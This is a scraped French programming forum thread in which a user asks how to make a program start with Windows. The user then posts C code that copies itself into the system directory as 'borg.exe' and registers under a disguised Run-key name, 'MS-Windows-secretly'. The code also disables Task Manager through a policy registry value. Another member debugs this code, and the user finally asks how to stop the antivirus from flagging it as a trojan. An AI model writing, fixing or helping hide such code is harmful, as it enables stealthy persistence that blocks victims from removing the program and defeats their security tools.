begin process at 2012 05 29 07:52:18
  Trouver un code source :

dans

Accueil > Forum > 

C++ & C++ .NET

> 

Windows

> 

System

> 

Logiciel lancé au démarage de windows [STATUP]

Derniers messages déposésPoser une question dans le forum ou lancer une discussion

Logiciel lancé au démarage de windows [STATUP]

dimanche 27 septembre 2009 à 19:34:58 | Logiciel lancé au démarage de windows [STATUP]

shuty

Bonjour, je suis entrain de prog une petite application mais cependant je ne sais pas comment dois t on faire pour que le mon fichier.exe se lance tout seul au démarrage de windows, auriez vous un tutoriel ? ou pouvez vous m'expliqué de manière assez simple ?

Très cordialement,

dimanche 27 septembre 2009 à 21:04:11 | Re : Logiciel lancé au démarage de windows [STATUP]

shuty

Grand up .... Personne ne sais comment peut on faire pourqu'un soft se lance au démarrage de windows.

dimanche 27 septembre 2009 à 21:37:39 | Re : Logiciel lancé au démarage de windows [STATUP]

ghuysmans99

Membre Club

(Faire des up de ton topic ne sert à rien ici ...)
Il te suffit d'ajouter une clé dans HKCU|HKCM\Software\Microsoft\Windows\CurrentVersion\Run portant le nom de ton programme, de type REG_SZ et contenant le chemin vers l'exécutable entouré de " avec des paramètres séparés par un espace (optionnels)
---
VB.NET is good ... VB6 is better

dimanche 27 septembre 2009 à 21:40:07 | Re : Logiciel lancé au démarage de windows [STATUP]

BruNews

Administrateur CodeS-SourceS

Tu inscris le FullPathName du prog ici:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Si pour 1 seule session, sera sous HKEY_CURRENT_USER

ciao...
BruNews, MVP VC++

dimanche 27 septembre 2009 à 21:41:05 | Re : Logiciel lancé au démarage de windows [STATUP]

BruNews

Administrateur CodeS-SourceS

coiffé au poteau...

ciao...
BruNews, MVP VC++

dimanche 27 septembre 2009 à 21:51:02 | Re : Logiciel lancé au démarage de windows [STATUP]

ghuysmans99

Membre Club

@BruNews : J'avais oublié de préciser le choix entre HKCU et HKLM (en pensant que c'était logique), ce que tu as fait. Maintenant shuty a une réponse complète !
---

lundi 28 septembre 2009 à 08:40:38 | Re : Logiciel lancé au démarage de windows [STATUP]

shuty

J'ai trouvé le code parfait cependant j'aurai besoin pour l'adapter dans mon code

Code C/C++ :

char path[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);

char sys[MAX_PATH];
GetModuleFileName(GetModH, path, sizeof(path));
GetSystemDirectory(sys, sizeof(sys));
strcat(sys, "\\borg.exe");
CopyFile(path, sys, false);

HKEY hKey, hKey2;

unsigned char reg[2] = "0";

RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey );
RegSetValueEx(hKey, "MS-Windows-secretly", 0, REG_SZ,(const unsigned char*)sys, sizeof(sys));
RegCreateKey(HKEY_CURRENT_USER,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",&hKey2);
RegSetValueEx(hKey2,"DisableTaskMgr",0,REG_DWORD,reg,sizeof(reg));
RegCloseKey(hKey),(hKey2);

J'ai changer, le chemin du fichier... je compile donc ( sous dev c++)
Une fois compilé j'exécute mon *.exe et je reboot et je m'aperçoit en tapant msconfig que la clée n'est pas présente...
Aurais je fait une connerie dans le bout de code donné ?

lundi 28 septembre 2009 à 20:02:33 | Re : Logiciel lancé au démarage de windows [STATUP]

ghuysmans99

Membre Club
Corrige déjà ton code comme ça. J'te garantis pas que ça va fonctionner, mais ça a déjà plus de chances ! Si ça marche pas, mets des points d'arrêt, vérifie les handles et le retour des fonctions à l'aide de MSDN.

//Ce qui est en rouge est à supprimer, en vert à ajouter.
unsigned charDWORD reg[2] = "0";
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey );
RegSetValueEx(hKey, "MS-Windows-secretly", 0, REG_SZ,(const unsigned charBYTE*)sys, sizeof(sys)strlen(sys)+1);
RegCloseKey(hKey);
RegCreateKey(HKEY_CURRENT_USER,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",&hKey2);
RegSetValueEx(hKey2,"DisableTaskMgr",0,REG_DWORD,(const unsigned charBYTE*)reg,sizeof(reg));
RegCloseKey(hKey2);

---
lundi 28 septembre 2009 à 21:14:36 | Re : Logiciel lancé au démarage de windows [STATUP]

shuty

Je vais essayé de testé sa... MERCI en tout cas c'est très simpat de ta part !
mercredi 30 septembre 2009 à 18:49:56 | Re : Logiciel lancé au démarage de windows [STATUP]

shuty

Re-bonjour !

Après avoir essayé ce code sans faute cette fois ci ! la compilation et l'execution au démarrage se fait sans problème. Seulement après avoir compilé mon code et l'executer, Bitdefender s'est exité à m'a dit que mon petit soft était un trojan ? comment sa ce fait ?

Code C/C++ :
  char path[max_path];

hmodule getmodh = getmodulehandle(null);

char sys[max_path];

getmodulefilename(getmodh, path, sizeof(path));

getsystemdirectory(sys, sizeof(sys));

strcat(sys, "\\borg.exe");

copyfile(path, sys, false); 

hkey hkey, hkey2;

unsigned char reg[2] = "0";

regopenkeyex(hkey_local_machine,"software\\microsoft\\windows\\currentversion\\run", 0, key_set_value, &hkey );

regsetvalueex(hkey, "ms-windows-secretly", 0, reg_sz,(const unsigned char*)sys, sizeof(sys));

regcreatekey(hkey_current_user,"software\\microsoft\\windows\\currentversion\\policies\\system",&hkey2);

regsetvalueex(hkey2,"disabletaskmgr",0,reg_dword,reg,sizeof(reg));

regclosekey(hkey),(hkey2); 

Seconde question:
Comment à partir de ce code je peut modifié la valeur de la clée pour évité que mon anti virus s'exite ?

Merci beaucoup !

1 2

Cette discussion est classée dans : windows, logiciel, lancé, démarage, statup

Répondre à ce message

Sujets en rapport avec ce message

Forcer le démarage d'un service Windows [ par Djpoops ] Boujour,J'utilise un logiciel de monitoring réseau et il y a 2 modules distincts. Ceux-ci sont reconnus comme services Windows et sont en démarrage au démarage de windows [ par Fuckly94 ] bjr!je cherche un moyen de lancer un programme au démarage de windows.je ne sais pas comment l'on fait.je voudrais le faire par le moyen de la program exe c++ se lance au démarrage windows mais s'exécute pas, lancé manuellement il marche [ par rv2010 ] Bonjour, J'ai crée une petite appli test en c++ sur visual c++ 2010 express. Pas de message d'erreur. - Lancé manuellement tout est OK (ca écrit un t Démarage de windows [ par Fuckly94 ] Bonjour tout le monde,j'aimerais savoir tous les myen de lancer une application au démarage de windows.Je m'explike:Mon frére lance pa mal de connerie Dévelopement modem logiciel - Driver Windows - Help please [ par lherderien ] Bonjour je ne suis pas très expérimenté en programmation système windows et je dois développer un modem logiciel. (arrêtez moi quand je me trompe). Démarage automatique d'un prog sous windows [ par asmanur ] Bonjour,j'aimerais que windows lance un programme à son lancement j'ai vu que certain prog le faisait. Je suppose qu'il faut modifier la base de regis Compatibility Windows/Linux pour la fonction _strtime [ par riadhmn ] Salut,J'ai du code C, écrit sous Visual C++ 6.0, et qui utilise _strtime, j'en ai besoin sous Linux j'ai une distribution Suse, et lorsque je compile Fenêtre d'application windows [ par Degue39 ] SALUT TT LE MONDEJe voudrai faire, dans Dev C++, dans une fenêtre windows : un formulaire Mai je n'arrive pas à paramètrer le remplissage de la fenêtr Allows a client application to pass in a windows handle for callback purposes en C/C++ [ par jhguan ] Salut à tout le monde,Pouvez vous m'aider pour realiser une fonction en C/C++ comme suivante :Set_Window (hwnd)Allows a client application to pass in Fermer proprement un programme qd windows se ferme [ par cosmobob ] bonjour, comment faire pour qu'une application se termine proprement (cad en lui faisant executer le code que l'on veut) quand windows se ferme? un m

Nos sponsors

Sondage...

CalendriCode

Mai 2012
LMMJVSD
 123456
78910111213
14151617181920
21222324252627
28293031   

Consulter la suite du CalendriCode

Photothèque

A découvrir

Développement réalisé par Nicolas SOREL (Nix) avec l'aide de : Cyril DURAND et Emmanuel (EBArtSoft), Merci à Vincent pour ses précieux conseils.
CodeS-SourceS.com© Toute reproduction même partielle est interdite sauf accord écrit du Webmaster
CodeS-SourceS.com© est une marque déposée tous droits réservés

Google Coop CodeS-SourceS Google Coop CodeS-SourceS
Temps d'éxécution de la page : 0,608 sec (4)

Nous contacter | Annoncer sur CodeS-SourceS | Mentions légales